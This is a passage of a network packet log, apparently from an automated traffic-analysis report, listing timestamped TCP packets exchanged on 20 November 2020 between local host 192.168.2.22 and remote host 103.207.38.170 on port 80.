                                                                                                                                                      Nov 20, 2020 20:04:34.509156942 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.509169102 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.509180069 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.509191990 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.509213924 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.509221077 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.509255886 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.511065006 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.517977953 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518018007 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518047094 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518074036 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518099070 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518125057 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518131018 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.518150091 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518172979 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.518174887 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518201113 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518225908 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518253088 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518265009 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.518279076 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518280983 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.518304110 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518305063 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.518328905 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518336058 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.518354893 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518379927 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518387079 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.518404007 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518428087 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518428087 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.518455029 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518457890 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.518484116 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518490076 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.518508911 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518517017 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.518533945 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518558979 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518584013 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518599033 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.518609047 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518611908 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.518637896 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518642902 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.518666029 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518671036 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.518697023 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518707991 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.518723011 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518748999 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518752098 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.518781900 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518785000 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.518805027 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518826008 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518826962 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.518846035 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518870115 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518882990 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.518893957 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518915892 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518923998 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.518934011 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.518939972 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518963099 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518978119 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.518985987 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519006968 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519009113 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519027948 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519042969 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519052982 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519077063 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519098997 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519110918 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519124031 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519124985 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519145966 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519170046 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519179106 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519192934 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519206047 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519216061 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519241095 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519264936 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519277096 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519289017 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519289017 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519310951 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519335032 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519345045 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519357920 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519382000 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519382000 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519406080 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519418001 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519431114 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519455910 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519454956 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519484997 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519500971 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519507885 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519526005 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519526958 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519546986 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519563913 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519583941 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519607067 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519629955 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519651890 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519659996 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519670010 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519686937 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519700050 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519702911 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519720078 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519742012 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519768000 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519792080 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519794941 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519813061 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519834995 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519834995 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519856930 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519876957 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519877911 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519900084 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519911051 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519918919 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519942999 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519965887 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519989014 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520006895 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520006895 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520018101 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520030975 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520046949 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520056009 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520077944 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520087957 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520100117 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520122051 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520140886 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520153999 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520165920 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520167112 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520190001 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520207882 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520210981 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520235062 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520241976 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520257950 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520279884 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520299911 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520302057 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520313025 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520324945 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520351887 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520354033 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520373106 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520382881 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520394087 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520415068 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520420074 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520437002 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520458937 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520471096 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520483017 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520497084 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520504951 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520530939 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520539045 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520555973 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520580053 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520580053 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520605087 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520615101 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520644903 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520658016 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520708084 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.525518894 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.727513075 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.727571964 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.727612019 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.727652073 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.727653027 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.727682114 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.727688074 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.727690935 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.727713108 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.727729082 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.727744102 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.727767944 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.727782965 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.727807999 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.727821112 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.727857113 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.727859974 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.727900982 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.727911949 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.727943897 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.727967978 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.727982998 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.727993965 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.728022099 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.728034019 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.728059053 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.728077888 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.728099108 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.728115082 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.728137016 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.728142977 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.728184938 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.728194952 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.728228092 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.728235006 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.728265047 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.728276014 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.728303909 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.728339911 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.728342056 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.728355885 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.728379965 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.728395939 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.728419065 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.728424072 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.728456974 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.728482962 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.728504896 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.728507996 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.728550911 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.728559017 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.728590965 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.728621960 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.728631020 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.728650093 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.728671074 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.728682041 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.728708029 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.728718996 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.728746891 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.728771925 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.728785038 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.728799105 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.728832960 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.728837967 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.728933096 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.947469950 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.947597980 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.947665930 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.947706938 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.947721004 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.947741032 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.947750092 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.947849989 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.947892904 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.947920084 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.947941065 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.947995901 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.948055029 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.948096037 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.948110104 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.948112965 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.948117971 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.948174000 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.948215008 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.948235035 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.948256969 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.948291063 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.948352098 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.948358059 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.948365927 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.948420048 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.948477030 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.948487043 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.948499918 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.948534012 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.948543072 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.948594093 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.948632956 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.948649883 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.948708057 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.948745012 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.948760033 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.948766947 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.948800087 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.948834896 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.948896885 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.948913097 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.948924065 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.948956013 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.949014902 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.949028969 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.949044943 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.949071884 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.949089050 CET4916580192.168.2.22103.207.38.170
